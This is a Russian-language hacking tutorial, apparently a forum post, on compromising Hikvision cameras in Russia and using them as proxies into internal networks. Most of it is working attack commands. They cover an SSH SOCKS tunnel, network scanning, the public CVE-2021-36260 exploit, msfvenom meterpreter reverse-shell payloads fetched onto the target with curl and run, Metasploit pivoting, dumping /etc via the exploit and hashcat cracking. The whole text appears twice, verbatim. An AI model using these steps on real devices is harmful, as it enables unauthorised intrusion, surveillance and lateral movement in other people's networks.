Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нём некорректно. Вам необходимо обновить браузер или попробовать использовать другой.
Сетевой шпионаж: использование российских камер в качестве прокси для сокрытия ваших данных
Привет, кибервоины! Вы уже слышали о роли взлома камер в шпионаже. В предыдущей серии мы рассказывали, как следили за российскими войсками на оккупированной территории Украины. В ходе продолжающейся кибервойны мы получили доступ к огромному количеству камер по всей России, начиная с оккупированных территорий и заканчивая Москвой.
На этот раз мы пойдем дальше и покажем, как взлом камеры может дать вам доступ к сети, стоящей за ней.
Предположим, вы взломали камеру и хотите глубже проникнуть в сеть. Мы рассмотрим несколько примеров, начиная с включения SSH и заканчивая развёртыванием полезных нагрузок с использованием незакрытых уязвимостей. В частях 2 и 3 вы научитесь анализировать и модифицировать прошивку.
Случай 1: Hikvision
Hikvision — один из самых распространённых брендов камер в России. Как показано на скриншоте ниже, тысячи их устройств доступны для онлайн-запросов через Shodan. Многие из них до сих пор не имеют исправлений известных уязвимостей, таких как CVE-2021-36260, даже в 2025 году. Эта уязвимость может дать вам доступ к shell-серверу устройства.
Если вы взломали пароль и попали в веб-интерфейс, зайдите в настройки и включите SSH. Эта настройка часто доступна на камерах Hikvision, а иногда и на камерах других брендов.
После включения SSH настройте SSH-туннель для маршрутизации трафика через камеру с теми же учетными данными: kali > ssh -D 9050 -4 admin@<camera_ip>
Если учётные данные подходят, всё в порядке. Иногда порт SSH ожидает другой набор учётных данных. Помните, что настройка SSH может автоматически отключиться через некоторое время, поэтому вам потребуется снова включить её через панель управления.
Теперь настраиваем proxychains: Кали > sudo nano /etc/proxychains4.conf
Убедитесь, что порт (9050) совпадает с портом, который вы использовали в SSH-туннеле. С этой настройкой вы можете начать сканирование внутренней сети. Большинство камер не отделены от других устройств, поэтому, оказавшись внутри, вы можете обмениваться данными практически с любым устройством. Давайте выполним простое сканирование сети через камеру. Обратите внимание, что в примере ниже я использовал другой порт: Кали > proxychains4 nmap 192.168.1.0/24 -Pn
Если nmap недоступен, используйте nc : Кали > proxychains4 nc -zv 192.168.1.15 445
Для упрощения сканирования подсетей вы можете автоматизировать этот процесс с помощью простого цикла bash. Важно знать, как сканировать хосты с помощью nc , поскольку на целевой машине могут быть установлены не все необходимые инструменты.
Случай 2: CVE-2021-36260
Эта уязвимость Hikvision до сих пор не исправлена во многих системах. Если вы обнаружите цель с этой уязвимостью, запустите эксплойт следующим образом: kali > git clone https://github.com/Aiminsun/CVE-2021-36260
kali > cd CVE-2021-36260
kali > python3 CVE-2021-36260.py –rport <порт_камеры> –rhost <ip_камеры> –shell
После создания оболочки вам понадобится полезная нагрузка, чтобы превратить камеру в сетевой прокси-сервер. Давайте посмотрим, как сгенерировать нужную полезную нагрузку в зависимости от архитектуры устройства.
Архитектура
Сначала вам нужно определить архитектуру цели: цель > uname -m
Распространенные результаты и их значение: x86 или i686 : 32-бит Intel x86_64 : 64-бит Intel armv7l : ARM mips, mipsel : варианты MIPS
Генерация полезной нагрузки
Для 32-битной версии Intel: kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Для 64-битной версии Intel: kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Для ARM: kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Для MIPS: kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
После создания загрузите и запустите полезную нагрузку.
Загрузка файла
Просто используйте curl при размещении полезной нагрузки на HTTP-сервере. Сначала перейдите в каталог, где была сгенерирована полезная нагрузка, а затем настройте HTTP-сервер: kali > cd payload
kali > python3 -m http.server
цель > curl -O http://kali_ip:8000/shell.elf цель > chmod +x shell.elf
цель > ./shell.elf
Если у вас открыт порт SSH, вы можете использовать это: kali > scp shell.elf admin@<camera_ip>:/tmp/shell.elf
цель > cd /tmp
цель > chmod +x shell.elf
цель > ./shell.elf
Слушатель
Настройте на своем компьютере обработчик с той же полезной нагрузкой для приема соединения.
Meterpreter Proxy
После восстановления сеанса Meterpreter нам нужно настроить маршрутизацию. Маршрутизация в Metasploit определяет, какие хосты доступны через сеанс: Meterpreter > run autoroute -s 192.168.1.0/24
Meterpreter > фон
msf6 > использовать вспомогательный/сервер/socks_proxy
msf6 > запустить -j
Вот как следует настроить модуль. При необходимости обновите proxychains4.conf , указав в нём прокси-сервер (9050), и теперь вы можете сканировать и перемещаться внутри внутренней сети по мере необходимости, как и в первом случае.
Бонус: Взлом хешей
Есть ещё один способ получить доступ к камерам Hikvision. В некоторых случаях брандмауэр блокирует попытку запуска шелл-сервера с помощью опции --shell из эксплойта CVE-2021-36260. В этом случае можно прибегнуть к подбору хеша пароля из панели администратора.
Начните с использования приведенной ниже команды, чтобы попытаться извлечь содержимое каталога /etc/ : python3 CVE-2021-36260.py –rhost <IP-адрес_камеры> –rport <порт_камеры> –cmd “cat /etc/*”
Эксплойт не поддерживает сложные команды, поэтому вам нужно действовать эффективно. Вы не сможете разделить полезную нагрузку, как мы сделаем во второй части. Вместо этого вам нужно быстро найти файл с хэшами.
Скопировав хеш, приступайте к его взлому. В Hikvision есть встроенное требование, чтобы все пароли были длиной не менее 8 символов. Поэтому перед запуском hashcat отфильтруйте свой список слов: awk 'length($0) >= 8' rockyou.txt > wordlist.txt
Это сэкономит время и позволит пропустить ненужные короткие записи. Взлом хеша — ресурсоёмкий процесс, который может занять некоторое время в зависимости от вашего оборудования и сложности пароля. Запустите hashcat в режиме 500 (шифрование MD5), как показано ниже: hashcat -m 500 hash.txt список_слов.txt
Запустите его и наблюдайте за успешным восстановлением. При наличии настойчивости и достаточной стойкости словаря вы в конечном итоге взломаете пароль. После этого используйте его для входа через веб-интерфейс или SSH, если вы позже включите его. Этот метод медленнее других, но эффективен при сбое полезной нагрузки оболочки. Сохраните его в своём инструментарии, когда другие векторы будут закрыты.
Заключение
Как показано, некоторые камеры легко превратить в промежуточный этап. Всё, что вам нужно, — это работающий пароль, незакрытая уязвимость или хороший список слов. Поскольку камеры редко отделены от основной сети, как только вы в неё попадаете, у вас появляется потенциальный доступ ко всему. Они служат отличными прокси-серверами для сетевой разведки и дальнейших атак.
Привет, кибервоины! Вы уже слышали о роли взлома камер в шпионаже. В предыдущей серии мы рассказывали, как следили за российскими войсками на оккупированной территории Украины. В ходе продолжающейся кибервойны мы получили доступ к огромному количеству камер по всей России, начиная с оккупированных территорий и заканчивая Москвой.
На этот раз мы пойдем дальше и покажем, как взлом камеры может дать вам доступ к сети, стоящей за ней.
Предположим, вы взломали камеру и хотите глубже проникнуть в сеть. Мы рассмотрим несколько примеров, начиная с включения SSH и заканчивая развёртыванием полезных нагрузок с использованием незакрытых уязвимостей. В частях 2 и 3 вы научитесь анализировать и модифицировать прошивку.
Случай 1: Hikvision
Hikvision — один из самых распространённых брендов камер в России. Как показано на скриншоте ниже, тысячи их устройств доступны для онлайн-запросов через Shodan. Многие из них до сих пор не имеют исправлений известных уязвимостей, таких как CVE-2021-36260, даже в 2025 году. Эта уязвимость может дать вам доступ к shell-серверу устройства.
Если вы взломали пароль и попали в веб-интерфейс, зайдите в настройки и включите SSH. Эта настройка часто доступна на камерах Hikvision, а иногда и на камерах других брендов.
После включения SSH настройте SSH-туннель для маршрутизации трафика через камеру с теми же учетными данными: kali > ssh -D 9050 -4 admin@<camera_ip>
Если учётные данные подходят, всё в порядке. Иногда порт SSH ожидает другой набор учётных данных. Помните, что настройка SSH может автоматически отключиться через некоторое время, поэтому вам потребуется снова включить её через панель управления.
Теперь настраиваем proxychains: Кали > sudo nano /etc/proxychains4.conf
Убедитесь, что порт (9050) совпадает с портом, который вы использовали в SSH-туннеле. С этой настройкой вы можете начать сканирование внутренней сети. Большинство камер не отделены от других устройств, поэтому, оказавшись внутри, вы можете обмениваться данными практически с любым устройством. Давайте выполним простое сканирование сети через камеру. Обратите внимание, что в примере ниже я использовал другой порт: Кали > proxychains4 nmap 192.168.1.0/24 -Pn
Если nmap недоступен, используйте nc : Кали > proxychains4 nc -zv 192.168.1.15 445
Для упрощения сканирования подсетей вы можете автоматизировать этот процесс с помощью простого цикла bash. Важно знать, как сканировать хосты с помощью nc , поскольку на целевой машине могут быть установлены не все необходимые инструменты.
Случай 2: CVE-2021-36260
Эта уязвимость Hikvision до сих пор не исправлена во многих системах. Если вы обнаружите цель с этой уязвимостью, запустите эксплойт следующим образом: kali > git clone https://github.com/Aiminsun/CVE-2021-36260
kali > cd CVE-2021-36260
kali > python3 CVE-2021-36260.py –rport <порт_камеры> –rhost <ip_камеры> –shell
После создания оболочки вам понадобится полезная нагрузка, чтобы превратить камеру в сетевой прокси-сервер. Давайте посмотрим, как сгенерировать нужную полезную нагрузку в зависимости от архитектуры устройства.
Архитектура
Сначала вам нужно определить архитектуру цели: цель > uname -m
Распространенные результаты и их значение: x86 или i686 : 32-бит Intel x86_64 : 64-бит Intel armv7l : ARM mips, mipsel : варианты MIPS
Генерация полезной нагрузки
Для 32-битной версии Intel: kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Для 64-битной версии Intel: kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Для ARM: kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Для MIPS: kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
После создания загрузите и запустите полезную нагрузку.
Загрузка файла
Просто используйте curl при размещении полезной нагрузки на HTTP-сервере. Сначала перейдите в каталог, где была сгенерирована полезная нагрузка, а затем настройте HTTP-сервер: kali > cd payload
kali > python3 -m http.server
цель > curl -O http://kali_ip:8000/shell.elf цель > chmod +x shell.elf
цель > ./shell.elf
Если у вас открыт порт SSH, вы можете использовать это: kali > scp shell.elf admin@<camera_ip>:/tmp/shell.elf
цель > cd /tmp
цель > chmod +x shell.elf
цель > ./shell.elf
Слушатель
Настройте на своем компьютере обработчик с той же полезной нагрузкой для приема соединения.
Meterpreter Proxy
После восстановления сеанса Meterpreter нам нужно настроить маршрутизацию. Маршрутизация в Metasploit определяет, какие хосты доступны через сеанс: Meterpreter > run autoroute -s 192.168.1.0/24
Meterpreter > фон
msf6 > использовать вспомогательный/сервер/socks_proxy
msf6 > запустить -j
Вот как следует настроить модуль. При необходимости обновите proxychains4.conf , указав в нём прокси-сервер (9050), и теперь вы можете сканировать и перемещаться внутри внутренней сети по мере необходимости, как и в первом случае.
Бонус: Взлом хешей
Есть ещё один способ получить доступ к камерам Hikvision. В некоторых случаях брандмауэр блокирует попытку запуска шелл-сервера с помощью опции --shell из эксплойта CVE-2021-36260. В этом случае можно прибегнуть к подбору хеша пароля из панели администратора.
Начните с использования приведенной ниже команды, чтобы попытаться извлечь содержимое каталога /etc/ : python3 CVE-2021-36260.py –rhost <IP-адрес_камеры> –rport <порт_камеры> –cmd “cat /etc/*”
Эксплойт не поддерживает сложные команды, поэтому вам нужно действовать эффективно. Вы не сможете разделить полезную нагрузку, как мы сделаем во второй части. Вместо этого вам нужно быстро найти файл с хэшами.
Скопировав хеш, приступайте к его взлому. В Hikvision есть встроенное требование, чтобы все пароли были длиной не менее 8 символов. Поэтому перед запуском hashcat отфильтруйте свой список слов: awk 'length($0) >= 8' rockyou.txt > wordlist.txt
Это сэкономит время и позволит пропустить ненужные короткие записи. Взлом хеша — ресурсоёмкий процесс, который может занять некоторое время в зависимости от вашего оборудования и сложности пароля. Запустите hashcat в режиме 500 (шифрование MD5), как показано ниже: hashcat -m 500 hash.txt список_слов.txt
Запустите его и наблюдайте за успешным восстановлением. При наличии настойчивости и достаточной стойкости словаря вы в конечном итоге взломаете пароль. После этого используйте его для входа через веб-интерфейс или SSH, если вы позже включите его. Этот метод медленнее других, но эффективен при сбое полезной нагрузки оболочки. Сохраните его в своём инструментарии, когда другие векторы будут закрыты.
Заключение
Как показано, некоторые камеры легко превратить в промежуточный этап. Всё, что вам нужно, — это работающий пароль, незакрытая уязвимость или хороший список слов. Поскольку камеры редко отделены от основной сети, как только вы в неё попадаете, у вас появляется потенциальный доступ ко всему. Они служат отличными прокси-серверами для сетевой разведки и дальнейших атак.
